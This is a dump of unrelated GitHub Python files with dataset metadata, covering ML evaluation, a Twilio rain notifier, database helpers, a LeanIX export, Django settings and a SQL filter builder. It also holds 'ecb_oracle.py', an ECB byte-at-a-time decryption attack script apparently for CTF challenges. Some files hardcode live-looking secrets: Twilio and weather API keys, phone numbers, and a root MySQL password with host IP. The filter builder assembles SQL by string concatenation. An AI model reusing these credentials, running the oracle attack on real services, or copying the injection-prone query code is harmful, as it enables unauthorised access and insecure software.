model.load_weights('{}/weights.{}.hd5'.format(sys.argv[4], epoch))\n\n query = 0\n correct = 0\n all_distances = []\n all_confidences = []\n epoch_top5Indexes = []\n epoch_top5filenames = []\n\n for dirs in zip(dlist_v1, dlist_v2):\n flist_v1 = glob(os.path.join(dirs[0], '*.png'))\n flist_v2 = glob(os.path.join(dirs[1], '*.png'))\n flist_v1.sort()\n flist_v2.sort()\n logger.log(30, '{} {}'.format(len(flist_v1), len(flist_v2)))\n query += len(flist_v1)\n\n q_feats = []\n for index, img in enumerate(flist_v2):\n if index%500 == 0:\n # print(\"flist_v2\", j)\n logger.log(30, 
\"flist_v2 {}\".format(index))\n q_img = get_img(img)\n q_img = np.expand_dims(q_img, axis=0)\n q_feat = model.predict(q_img,batch_size=1)\n q_feats.append(q_feat)\n\n min_index = 0\n file = open(\"query.json\", \"w\")\n json.dump(flist_v1, file)\n # -----------------------------------\n for i, ref in enumerate(flist_v1):\n # 手順画像ごとに実行\n\n # top5\n rank_dist = [1000,1000,1000,1000,1000]\n rank_index = [0,0,0,0,0]\n top5_filename = [\"\",\"\",\"\",\"\",\"\"]\n\n # top20\n # rank_dist = []\n # rank_index = []\n # top5_filename = []\n # for i in range(20):\n # rank_dist.append(100)\n # rank_index.append(0)\n # top5_filename.append(\"\")\n\n # -----------------------------\n\n ref_img = get_img(ref)\n ref_img = np.expand_dims(ref_img, axis=0)\n r_feat = model.predict(ref_img,batch_size=1)\n\n min_dist = 1000\n nn = 0\n confidences = []\n distances = []\n\n for j in range(min_index, len(q_feats)):\n dist = np.linalg.norm( r_feat[0] - q_feats[j][0])\n\n # 手順画像に対してフレーム1枚ごとに実行\n # フレーム数分だけforが回る\n\n # top1\n if dist < min_dist:\n min_dist = dist\n nn = j\n\n distances.append(dist)\n confidences.append(1.0 - dist)\n\n # top5\n rank_dist, rank_index, top5_filename = top5(rank_dist, rank_index, dist, j, flist_v2[j], top5_filename)\n\n # confidence_graph(confidences, i)\n all_distances.append(distances)\n all_confidences.append(confidences)\n\n na = np.array(all_confidences, dtype=np.float)\n\n # top1\n logger.log(30, '{} {} {}'.format(i+1, nn, min_dist))\n file_index = (os.path.basename(flist_v2[nn])).split('.')[0]\n key_indexs.append(int(file_index))\n logger.log(30, 'query = {}'.format(ref))\n logger.log(30, 'top1 = {}'.format(flist_v2[nn]))\n\n # top5\n logger.log(30, 'rank_dist = {} \\nrank_index = {}'.format(rank_dist, rank_index))\n epoch_top5Indexes.append(rank_index)\n epoch_top5filenames.append(top5_filename)\n for i, name in enumerate(top5_filename):\n logger.log(30, \"top{} {}\".format(i+1, name))\n\n # このインデントは1つの手順画像が終わるごと\n # このインデントは全部の手順画像が終わったとき\n # このインデントはepochが終わった時\n allepoch_top5filenames.append(epoch_top5filenames)\n # logger.log(30, allepoch_top5filenames)\n # このインデントは全てのepochが終わった時\n\n # path = nx.dijkstra_path(make_tensor(all_distances, len(flist_v1), 0.6), 0, len(flist_v1)*len(flist_v2))\n\n # order_path = []\n # now = -1\n # for i, pa in enumerate(path):\n # pa = pa % len(flist_v1)\n # if now != pa:\n # now = pa\n # print(i)\n # order_path.append(pa)\n #\n # print(\"order_path = \",order_path)\n\n logger.log(30,\"key_indexs = {}\".format(key_indexs))\n\n # import value2_top5_186 as value186\n # import value2_top5_112 as value112\n # import value2_top5_186_017 as value186_017\n # import value2_top5_112_017 as value112_017\n #\n # top5Correct = value186.calcAccuracy(epoch_top5Indexes, logger)\n # top5Correct = value112.calcAccuracy(epoch_top5Indexes, logger)\n # top5Correct = value186_017.calcAccuracy(epoch_top5Indexes, logger)\n # top5Correct = value112_017.calcAccuracy(epoch_top5Indexes, logger)\n\n # logger.log(30, \"top5_correct = {}\".format(top5Correct))\n # top5Corrects.append(top5Correct)\n # logger.log(30, top5Corrects)\n\n file = open(\"candidate.json\", \"w\")\n json.dump(allepoch_top5filenames, file)\n\n\n\nif __name__ == '__main__':\n # train_aug()\n test()\n\n#model.fit_generator(...)\n","repo_name":"ryosism/tcn_tripletloss","sub_path":"src/tcn_tripletloss_value2.py","file_name":"tcn_tripletloss_value2.py","file_ext":"py","file_size_in_byte":12325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} 
+{"seq_id":"22719921416","text":"import requests\nfrom twilio.rest import Client\n\n# Autentificações para sms\naccount_sid = \"AC2fc1a3198702a13e0e104bb875182ba0\"\nauth_token = \"2ab0760e826e1fab9619cbca1ad4e82c\"\n\n# Autentificações para status do clima\nAPI_KEY = \"7dd0bddc5dc816205b464703f9a689c6\"\nMINHA_LATITUDE = -19.949250\nMINHA_LONGITUDE = -43.929296\n\nPARAMETROS = {\n    \"lat\": MINHA_LATITUDE,\n    \"lon\": MINHA_LONGITUDE,\n    \"appid\": API_KEY,\n}\n\nrequisicao = requests.get(url=\"https://api.openweathermap.org/data/2.5/forecast\", params=PARAMETROS) # pega a previsão do tempo dos próximos 5 dias com dados com distância de 3h\nrequisicao.raise_for_status()\n\ndados = requisicao.json()\n\nprevisao = dados[\"list\"][:4]\n\nlevar_guarda_chuva = False\n\nfor clima in previsao: #Verifica se terá chuva nas próximas 12h\n    if clima[\"weather\"][0][\"id\"] < 700:\n        levar_guarda_chuva = True\n\nif levar_guarda_chuva:\n    client = Client(account_sid, auth_token)\n\n    # Envia a mensagem SMS\n    mensagem = client.messages.create(\n        body=\"Vai Chover, leve um guarda chuva\",\n        from_='+18156058589',\n        to='+5531992889301'\n    )\n\n    print(mensagem.status)\n","repo_name":"TigoNunes/100-Days-of-Code","sub_path":"Notificador de chuva via SMS/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"5437760859","text":"import re\nimport datetime\nimport pytz\nimport pymysql\nfrom operator import itemgetter\n\ndef read_file():\n    list = []\n    with open('github_url.text','r') as f:\n        for line in f.readlines():\n            str = line.strip()\n            result = str.split('|')\n            coin_id = result[0]\n            coin_url = result[1]\n            split_str = re.split('([/])', coin_url)\n            dir = {}\n            try:\n                keyword = split_str[6] # 关键字\n            except:\n                continue\n            dir['coin_id'] = coin_id\n            dir['keyword'] = keyword\n            list.append(dir)\n    return list\n\n\ndef utc_to_local(utc_time_str, utc_format='%Y-%m-%dT%H:%M:%SZ'):\n    local_tz = pytz.timezone('Asia/Chongqing')\n    local_format = \"%Y-%m-%d %H:%M\"\n    utc_dt = datetime.datetime.strptime(utc_time_str, utc_format)\n    local_dt = utc_dt.replace(tzinfo=pytz.utc).astimezone(local_tz)\n    time_str = local_dt.strftime(local_format)\n    return time_str\n\ndef insert(sql):\n    # 打开数据库连接\n    db = pymysql.connect(host=\"118.190.175.23\", port=3306, user='root',password=\"2MbANhiG0w623rEw\", db=\"blockfuture\", charset='utf8mb4')\n\n    # 使用cursor()方法获取操作游标\n    cursor = db.cursor()\n\n    # 执行sql语句\n    cursor.execute(sql)\n    # 提交到数据库执行\n    db.commit()\n    print('insert successful')\n\n    # 关闭数据库连接\n    db.close()\n\ndef query(sql):\n    # 打开数据库连接\n    db = pymysql.connect(host=\"118.190.175.23\", port=3306, user='root',password=\"2MbANhiG0w623rEw\", db=\"blockfuture\")\n    try:\n        with db.cursor() as cursor:\n            count = cursor.execute(sql) # 影响的行数\n            result = cursor.fetchall() # 取出所有行\n            db.commit() # 提交事务\n            return result\n    except:\n        db.rollback() # 若出错了,则回滚\n\n    finally:\n        db.close()\n\ndef get_type(list,coin_id):\n    n = 1\n    myid = coin_id.split('&')[-1]\n    sort_list = sorted(list, key=itemgetter('stargazers_count'), reverse=True)\n    for i in sort_list:\n        i['type'] = n\n        i['coin_id'] = myid\n        n = n+1\n    return sort_list\n\ndef str_to_int(str):\n    s =str.split(',')\n    int2 = ''\n    for i in s:\n        int2 += i\n\n    return int(int2)\n\nif __name__ == '__main__':\n    print(len(query('select coin_id from coin_people where coin_name = \"BOScoin\"') ) 
)\n\n\n","repo_name":"lijielife/github_coin","sub_path":"read_url.py","file_name":"read_url.py","file_ext":"py","file_size_in_byte":2388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"33898775928","text":"#!/usr/bin/env python\n\nimport csv, glob, os\n\n#Seperate files into types\nA = []\nB = []\nC = []\nother = []\n\nos.chdir(\"ShortDiscounting\")\nfor file in glob.glob(\"*.csv\"):\n with open(file, 'r') as f:\n wordlist = [line.split()[0] for line in f]\n if (len(wordlist[0]) == 34):\n A.append(file)\n elif (len(wordlist[0]) == 91):\n B.append(file)\n elif (len(wordlist[0]) == 1):\n C.append(file)\n else:\n other.append(file)\n\n#Create dictionaries of file names and their date\nAdate = {}\nfor files in A:\n with open(files, 'rb') as f:\n datecol = [line.split(\",\")[1] for line in f]\n date = datecol[0].replace('-', '/')\n Adate[files] = date\nBdate= {}\nfor files in B:\n with open(files, 'rb') as f:\n datecol = [line.split(\",\")[0] for line in f]\n parsedStr = datecol[1].split(\" \")[1]\n date = parsedStr.replace('-', '/')\n Bdate[files] = date\n\n#Create reference dictionary\nwith open('eprime_dates_addtl_JP.csv', 'rb') as f:\n reader = csv.reader(f)\n IDs = {}\n next(reader)\n for row in reader:\n IDs.setdefault(row[0], []).append(row[3])\n IDs.setdefault(row[1], []).append(row[3])\n if row[2] == \"\":\n continue\n else:\n IDs.setdefault(row[2], []).append(row[3])\n#Correct date formatting\nfor key, value in IDs.iteritems():\n for date in value:\n parsed = date.split(\"/\")\n if (parsed[0][0] == \" \"):\n parsed[0] = parsed[0].replace(' ', '')\n if (len(parsed[0]) == 1):\n parsed[0] = \"0\" + parsed[0]\n if (len(parsed[1]) == 1):\n parsed[1] = \"0\" + parsed[1]\n date = \"/\".join(parsed)\n IDs[key] = date\n\n\n#Check if matched\nfor key in IDs:\n for files in Adate:\n underscoredFiles = files.replace('_', '-')\n if key in underscoredFiles:\n if Adate[files] == IDs[key]:\n print (underscoredFiles, key, Adate[files], IDs[key])\n for files in Bdate:\n underscoredFiles = files.replace('_', '-')\n if key in underscoredFiles:\n if Bdate[files] == IDs[key]:\n print (files, key, Bdate[files], IDs[key])\n\n\n\n","repo_name":"perronea/matchShortDiscounting","sub_path":"match.py","file_name":"match.py","file_ext":"py","file_size_in_byte":2207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"14902991347","text":"# This Script can be used to export the relationships between two FactSheets along with the attributes on the relation.\n# In this example we are looking at Application to ITC Relationship and Attribute on Relationship : technicalSuitability or Technical Fit.\n# This script will export the fields, Application,ITC, Application to ITC Relationship and also the attribute technicalSuitability\n# Output of this script is a file : Info.csv can be used as an input in importRelationship.py after making the relvant changes.\n# Changes required in the Script :-\n# 1. Adapt mtm_base_url as per your instance. Eg. us-svc,eu-svc\n# 2. Adapt pathfinder_base_url and apiToken\n# 3. Modify the query in getRelationVariablesToExport and include the attributes as per requirement.\n# 4. Also modify the CSV writer and newObject to include your attributes.\n\nimport json \nimport requests \nimport pandas as pd\nimport base64\nimport time\nimport csv\nimport datetime\n\n# 1. Adapt mtm_base_url as per your instance. Eg. 
us-svc,eu-svc\nmtm_base_url = 'https://eu-svc.leanix.net/services/mtm/v1'\n# 2. Adapt pathfinder_base_url\npathfinder_base_url = 'https://demo-eu.leanix.net/services/pathfinder/v1'\napiToken = \"\"\n\ndef getAccessToken(api_token):\n #different than callPost since it needs to send the auth_header\n response = requests.post(mtm_base_url+\"/oauth2/token\", auth=('apitoken', api_token),\n data={'grant_type': 'client_credentials'})\n response.raise_for_status() \n access_token = response.json()['access_token']\n return access_token\n\n\n\ndef getHeader(access_token):\n return {'Authorization': 'Bearer ' + access_token, 'Content-Type': 'application/json'}\n\n# Function to decipher the access_token\ndef getAccessTokenJson(access_token):\n payload_part = access_token.split('.')[1]\n # fix missing padding for this base64 encoded string.\n # If number of bytes is not dividable by 4, append '=' until it is.\n missing_padding = len(payload_part) % 4\n if missing_padding != 0:\n payload_part += '='* (4 - missing_padding)\n payload = json.loads(base64.b64decode(payload_part))\n return payload\n\ndef callPost(request_url, header, data):\n try:\n response = requests.post(url=request_url, headers=header, data=json.dumps(data))\n response.raise_for_status()\n except requests.exceptions.HTTPError as err:\n print(request_url)\n print(json.dumps(data))\n print(err)\n exit\n return response.json()\n\n\n\ndef updateHost(host):\n global pathfinder_base_url\n pathfinder_base_url = 'https://%s/services/pathfinder/v1'%(host)\n\ndef getApiToken():\n with open('../access.json') as json_file: \n data = json.load(json_file)\n# if (data[\"host\"] is not None):\n# updateHost(data[\"host\"])\n return data['apiTokenExportRelations']\n\ndef postGraphQl(query, access_token):\n response = callPost(pathfinder_base_url+'/graphql', getHeader(access_token), query)\n return response\n\n\n\ndef getRelationVariablesToExport():\n query = \"\"\"\n {\n allFactSheets(factSheetType: Application){\n totalCount\n edges{\n node{\n id\n displayName\n tags{\n id\n name\n }\n ... on Application{\n relApplicationToITComponent{\n edges{\n node{\n id\n factSheet{\n displayName\n id\n }\n technicalSuitability\n }\n }\n }\n }\n }\n }\n\n }\n }\n\n \"\"\"\n return {\"query\": query}\n\ndef getSingleFactsheet():\n query = \"\"\"{ \n factSheet(id:\"28fe4aa2-6e46-41a1-a131-72afb3acf256\") {\n id\n displayName\n ... 
on Application{\n relApplicationToUserGroup{\n edges{\n node{\n id\n activeFrom\n activeUntil\n }\n }\n }\n }\n }\n}\n\"\"\"\n return {\"query\": query}\n\n\n\ndef getGraphQl(query, access_token):\n response = callPost(pathfinder_base_url+'/graphql', getHeader(access_token), query)\n return response\n\n\naccess_token = getAccessToken(apiToken)\naccess_token_json = getAccessTokenJson(access_token)\n\n\n## notice the Dictionary Call ['data'] at the end ofhe function call.\ndata = getGraphQl(getRelationVariablesToExport(), access_token)['data']\n\n#print(json.dumps(data,indent=2))\n\nwith open('Info.csv', 'w') as csvfile:\n #writer = csv.writer(csvfile, delimiter=';') #For German Locale, we need another delimiter\n writer = csv.writer(csvfile, delimiter=';')\n writer.writerow(['Application','App ID', 'ITComponent', 'ITComponent ID','Relation ID', 'Tags','Attribute Value'])\n\n for fsnode in data['allFactSheets']['edges']:\n fs = fsnode['node']\n tags = fs['tags']\n tagCots = ''\n for tag in tags:\n if tag['name'] == 'COTS Package':\n tagCots = 'COTS Package'\n if tag['name'] == 'No COTS Package':\n tagCots = 'No COTS Package'\n for dateNode in fs['relApplicationToITComponent']['edges']:\n newObject = {\n \"application\":fs['displayName'],\n \"appId\":fs['id'],\n \"relationId\":dateNode['node']['id'],\n \"itcName\":dateNode['node']['factSheet']['displayName'],\n \"itcId\":dateNode['node']['factSheet']['id'],\n \"attributeValue\":dateNode['node']['technicalSuitability'],\n \"tagCots\":tagCots\n }\n writer.writerow([newObject['application'],newObject['appId'],newObject['itcName'],newObject['itcId'],newObject['relationId'],newObject['tagCots'],newObject['attributeValue']])","repo_name":"leanix-public/scripts","sub_path":"modifyAttributesOnRelations/exportRelationship.py","file_name":"exportRelationship.py","file_ext":"py","file_size_in_byte":5646,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"50"} +{"seq_id":"38041475575","text":"from pathlib import Path\nfrom envparse import env\n\nBASE_DIR = Path(__file__).resolve().parent.parent\n\nENV_FILE_PATH = BASE_DIR.joinpath('.env')\n\nif ENV_FILE_PATH.is_file():\n env.read_envfile(path=ENV_FILE_PATH)\n\nSECRET_KEY = env.str('SECRET_KEY')\n\nDEBUG = env.bool('DEBUG', default=False)\n\nALLOWED_HOSTS = ['*']\n\nINSTALLED_APPS = [\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'rest_framework',\n 'django_filters',\n 'social_django',\n 'core',\n 'goals',\n 'bot',\n]\n\nMIDDLEWARE = [\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'social_django.middleware.SocialAuthExceptionMiddleware',\n]\n\nROOT_URLCONF = 'todolist.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 
'todolist.wsgi.application'\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql',\n 'NAME': env.str('DB_NAME'),\n 'USER': env.str('DB_USER'),\n 'PASSWORD': env('DB_PASSWORD'),\n 'HOST': env.str('DB_HOST', default='127.0.0.1'),\n 'PORT': 5432,\n }\n}\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n 'OPTIONS': {\n 'min_length': 8,\n }\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_TZ = True\n\nSTATIC_URL = 'static/'\nSTATIC_ROOT = BASE_DIR.joinpath('static')\n\nAUTH_USER_MODEL = 'core.User'\n\nLOGGING = {\n 'disable_existing_loggers': False,\n 'version': 1,\n 'handlers': {\n 'console': {\n 'class': 'logging.StreamHandler',\n 'level': 'DEBUG',\n },\n },\n 'loggers': {\n '': {\n 'handlers': ['console'],\n 'level': 'DEBUG',\n 'propagate': False,\n },\n 'django.db': {\n 'level': 'DEBUG',\n },\n },\n}\n\nDEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'\n\n# Social Oauth\nSOCIAL_AUTH_JSONFIELD_ENABLED = True\nSOCIAL_AUTH_JSONFIELD_CUSTOM = 'django.db.models.JSONField'\nSOCIAL_AUTH_VK_OAUTH2_KEY = env.str('VK_OAUTH2_KEY')\nSOCIAL_AUTH_VK_OAUTH2_SECRET = env.str('VK_OAUTH2_SECRET')\nAUTHENTICATION_BACKENDS = (\n 'social_core.backends.vk.VKOAuth2',\n 'django.contrib.auth.backends.ModelBackend',\n)\nSOCIAL_AUTH_URL_NAMESPACE = 'social'\nSOCIAL_AUTH_LOGIN_REDIRECT_URL = '/'\nSOCIAL_AUTH_LOGIN_ERROR_URL = '/login-error/'\nSOCIAL_AUTH_VK_OAUTH2_SCOPE = ['email']\nSOCIAL_AUTH_VK_EXTRA_DATA = [\n ('email', 'email'),\n]\nSOCIAL_AUTH_NEW_USER_REDIRECT_URL = '/logged-in/'\nSOCIAL_AUTH_USER_MODEL = 'core.User'\n\nREST_FRAMEWORK = {\n 'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.LimitOffsetPagination',\n 'DATETIME_FORMAT': '%Y-%m-%d %H:%M:%S',\n}\n\nTG_TOKEN = env.str('TG_TOKEN')\n","repo_name":"VladimirVlasov1982/todolist","sub_path":"todolist/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"31380096729","text":"import pandas as pd\n\noracle_operators = {\n '==': '=', '!=': '!=', 'LIKE': 'LIKE',\n 'IN': 'IN', 'BETWEEN': 'BETWEEN', '>=': '>=',\n '<=': '<=', 'NOT IN': 'NOT IN', '>': '>', '<': '<'\n}\nsql_server_operators = {\n '==': '=', '!=': '!=', 'LIKE': 'LIKE',\n 'IN': 'IN', 'BETWEEN': 'BETWEEN', '>=': '>=',\n '<=': '<=', 'NOT IN': 'NOT IN', '>': '>', '<': '<'\n}\n\n\ndef get_operators(column):\n operators = {\n '==': [], '!=': [], 'LIKE': [],\n 'IN': [], 'BETWEEN': [], '>=': [],\n '<=': [], 'NOT IN': [], '>': [], '<': []\n }\n # get the params\n for my_filter in column['filtros']:\n if int(my_filter['tipo_valor']) == 2:\n my_filter['valor_filtro'] = f\"\\'{my_filter['valor_filtro']}\\'\"\n operators[my_filter['operador']].append(my_filter['valor_filtro'])\n\n if len(operators['==']) > 1 or (len(operators['==']) >= 1 and len(operators['IN']) >= 1):\n operators['IN'] = operators['IN'] + operators['==']\n operators['=='] = []\n if len(operators['!=']) > 1 or (len(operators['!=']) >= 1 and len(operators['NOT IN']) >= 1):\n operators['NOT IN'] = operators['NOT IN'] + operators['!=']\n operators['!='] = []\n\n return operators\n\n\ndef get_where(columns, sql_source):\n where = 
''\n    current_operators = {}\n    if sql_source == 1: # SQL SERVER\n        current_operators = sql_server_operators\n    else:\n        current_operators = oracle_operators\n\n    for column in columns:\n        operators = get_operators(column)\n        for operator in operators:\n            # IN - NOT IN\n            if (operator == 'IN' and len(operators[operator]) > 0) or (\n                    operator == 'NOT IN' and len(operators[operator]) > 0):\n                in_field = f\"{column['mapeo']} {current_operators[operator]} (\"\n                for value in operators[operator]:\n                    in_field += str(value) + ', '\n                in_field = in_field[:len(in_field) - 2] + ') AND '\n                where += in_field\n            # BETWEEN\n            elif operator == 'BETWEEN':\n                for value in operators[operator]:\n                    val1, val2 = value[1:len(value) - 1].split('|') # remove quotes and split\n                    val1 = f'\\'{val1}\\''\n                    val2 = f'\\'{val2}\\''\n                    where += column['mapeo'] + ' ' + current_operators[operator] + ' ' + str(val1) + ' AND ' \\\n                             + str(val2) + ' AND '\n            else:\n                for value in operators[operator]:\n                    where += column['mapeo'] + ' ' + current_operators[operator] + ' ' + str(value) + ' AND '\n    where = where[:len(where) - 5]\n    return where\n\n\ndef get_filter_query(columns, table='', sql_source=1):\n    query = ''\n\n    if sql_source == 1:\n\n        query = 'SELECT '\n        if len(columns) == 0:\n            query += '* '\n        for column in columns:\n            query += column['mapeo'] + ', '\n        query = query[:len(query) - 2] + f\", ROW_NUMBER() OVER(ORDER BY {columns[0]['mapeo']}) AS indice FROM {table} WHERE \"\n        query += get_where(columns, sql_source)\n        if query[len(query) - 6:] == 'WHERE ': # check no filters\n            query = query[:len(query) - 6]\n\n\n    if sql_source == 2:\n\n        query = 'SELECT '\n        if len(columns) == 0:\n            query += '* '\n        for column in columns:\n            query += column['mapeo'] + ', '\n        query = query[:len(query) - 2] + f', ROWNUM indice FROM {table} WHERE '\n        query += get_where(columns, sql_source)\n        if query[len(query) - 6:] == 'WHERE ': # check no filters\n            query = query[:len(query) - 6]\n    return query\n\n\ndef apply_filter_to_dataframe(dataframe, columns):\n    no_arithmetic = {'LIKE': like_to_pandas, 'IN': in_to_pandas, 'BETWEEN': between_to_pandas,\n                     'NOT IN': not_in_to_pandas}\n    filters_to_process = {}\n    for column in columns:\n        filters_to_process[column['mapeo']] = get_operators(column)\n    # First apply arithmetic operators\n    dataframe = arithmetic_to_pandas(dataframe, filters_to_process)\n    for operator in no_arithmetic:\n        if operator == 'BETWEEN':\n            dataframe = no_arithmetic[operator](dataframe, filters_to_process, columns)\n        else:\n            dataframe = no_arithmetic[operator](dataframe, filters_to_process)\n\n    if dataframe.shape[0] == 0:\n        raise ValueError(\"filtering produced an empty dataframe\")\n    return dataframe\n\n\ndef arithmetic_to_pandas(dataframe, values):\n    not_arithmetic = ['LIKE', 'IN', 'BETWEEN', 'NOT IN']\n    for value in values:\n        for operator in values[value]:\n            if operator not in not_arithmetic:\n                for filter_value in values[value][operator]:\n                    dataframe = dataframe.query(f\"{value} {operator} {filter_value} \")\n    return dataframe\n\n\ndef like_to_pandas(dataframe, values):\n    for value in values:\n        for filter_value in values[value]['LIKE']:\n            dataframe = dataframe.query(f\"{value}.str.contains({filter_value})\", engine='python')\n    return dataframe\n\n\ndef in_to_pandas(dataframe, values):\n    for value in values:\n        if len(values[value]['IN']) > 0:\n            dataframe = dataframe[dataframe[value].isin(values[value]['IN'])]\n    return dataframe\n\n\ndef not_in_to_pandas(dataframe, values):\n    for value in values:\n        if len(values[value]['NOT IN']) > 0:\n            dataframe = dataframe[~dataframe[value].isin(values[value]['NOT 
IN'])]\n    return dataframe\n\n\ndef between_to_pandas(dataframe, values, data):\n    for value in values:\n        if len(values[value]['BETWEEN']) > 0:\n            my_type = 1\n            for dat in data:\n                if dat['mapeo'] == value:\n                    my_type = dat['tipo']\n            val1, val2 = values[value]['BETWEEN'][0].split('|') # remove quotes and split\n            val1, val2 = val1[1:], val2[:len(val2) - 1]\n            # check types\n\n            if my_type == 1:\n                try:\n                    val1, val2 = int(val1), int(val2)\n                except ValueError:\n                    return dataframe\n            elif my_type == 4:\n                try:\n                    val1, val2 = float(val1), float(val2)\n                except ValueError:\n                    return dataframe\n            dataframe = dataframe[(dataframe[value] >= val1) & (dataframe[value] <= val2)]\n\n    return dataframe\n\n\nif __name__ == '__main__':\n    cols = [\n        {\n            \"mapeo\": \"ID_ANIOMES\",\n            \"tipo\": 2,\n            \"filtros\":\n                [\n                    {\n                        \"operador\": \"IN\",\n                        \"tipo_valor\": 1,\n                        \"valor_filtro\": \"201508\"\n                    },\n                    {\n                        \"operador\": \"BETWEEN\",\n                        \"tipo_valor\": 2,\n                        \"valor_filtro\": \"201508|201509\"\n                    }\n\n                ]\n        },\n        {\n            \"mapeo\": \"ID_CLIPADRE\",\n            \"tipo\": 1,\n            \"filtros\":\n                [\n                    {\n                        \"operador\": \"<=\",\n                        \"tipo_valor\": 1,\n                        \"valor_filtro\": \"9276\"\n                    }\n                ]\n        },\n        {\n            \"mapeo\": \"ID_MARCA_PADRE\",\n            \"tipo\": 2,\n            \"filtros\":\n                [\n                ]\n        },\n        {\n            \"mapeo\": \"INDICE\",\n            \"tipo\": 2,\n            \"filtros\":\n                [\n                    {\n                        \"operador\": \"!=\",\n                        \"tipo_valor\": 1,\n                        \"valor_filtro\": \"6000002\"\n                    }\n                ]\n        },\n        {\n            \"mapeo\": \"ID_SUBMERCADO\",\n            \"tipo\": 2,\n            \"filtros\":\n                [\n                    {\n                        \"operador\": \"LIKE\",\n                        \"tipo_valor\": 2,\n                        \"valor_filtro\": \"07R\"\n                    }\n                ]\n        }\n    ]\n\n    columns = []\n    for col in cols:\n        columns.append(col['mapeo'])\n\n    file = pd.read_csv('../../media/1/input/resultado104.csv', usecols=columns)\n\n    apply_filter_to_dataframe(file, cols)\n","repo_name":"juansuv/as","sub_path":"app/normaliza/extra/api_filters.py","file_name":"api_filters.py","file_ext":"py","file_size_in_byte":8187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"41669580678","text":"import matplotlib.pyplot as plt\n\n\ndef autolabel(rects, ax, xpos=\"center\", p=6):\n    \"\"\"\n    Attach a text label above each bar in *rects*, displaying its height.\n    *xpos* indicates which side to place the text w.r.t. the center of\n    the bar. 
It can be one of the following {'center', 'right', 'left'}.\n    \"\"\"\n    ha = {\"center\": \"center\", \"right\": \"left\", \"left\": \"right\"}\n    offset = {\"center\": 0, \"right\": 1, \"left\": -1}\n\n    for rect in rects:\n        height = rect.get_height()\n        height = round(height, p)\n        ax.annotate(\n            \"{}\".format(height),\n            xy=(rect.get_x() + rect.get_width() / 2, height),\n            xytext=(offset[xpos] * 3, 3), # use 3 points offset\n            textcoords=\"offset points\", # in both directions\n            ha=ha[xpos],\n            va=\"bottom\",\n        )\n\n\ndef draw_R_style1(lines):\n    plt.legend(lines, [l.get_label() for l in lines])\n    plt.gcf().canvas.set_window_title(\"Comparison\")\n    plt.xlabel(\"Wave Length\")\n    plt.ylabel(\"R\")\n    plt.gcf().set_size_inches(8, 8)\n    plt.ylim(0, 1)\n    plt.show()\n","repo_name":"mohammadsa9/ColorMatching","sub_path":"Example 4/libraries/MyPlot.py","file_name":"MyPlot.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"4677682650","text":"import string\nimport requests\nimport time\n\n# Change as per need\nnum_bytes_to_recover = 10\n\ndef encrypt(payload):\n    url = \"???\"\n    r = requests.get(\"url + payload usually\") \n    return r.json()['ciphertext'] # or wtv the way to get CT is\n\ndef brute_force():\n    flag = \"\"\n    bits_to_recover = num_bytes_to_recover * 8 - 1 # 0-indexed\n    alphabets = '_'+'@'+'}'+\"{\"+string.digits+string.ascii_lowercase+string.ascii_uppercase\n    \n    while(True):\n        payload = 'a' * (bits_to_recover - len(flag))\n        target = encrypt(payload.encode().hex())\n        print(\"Exp\", ' ', end=\"\")\n        \n        for a in alphabets:\n            trial = encrypt((payload + flag + a).encode().hex()) \n            print(a, \" \", end = '')\n\n            block_start = 8 * num_bytes_to_recover\n            if(trial[block_start:block_start*2] == target[block_start:block_start*2]):\n                flag += a \n                print(flag)\n                break \n        \n        # Ensure that the server is not blocking us\n        time.sleep(0.5)\n        \n        # Change as per need, usually flag ends with } \n        if flag.endswith(\"}\"):\n            print(flag)\n            break \n        \nif __name__ == \"__main__\":\n    brute_force() ","repo_name":"SnickeyX/CryptoScripts","sub_path":"symmetric/ecb_oracle.py","file_name":"ecb_oracle.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"25589113069","text":"# coding=utf8\nimport os, shutil, codecs, random, string, kwk8, baseparser, basechecker\nfrom xml.sax.saxutils import escape\nfrom 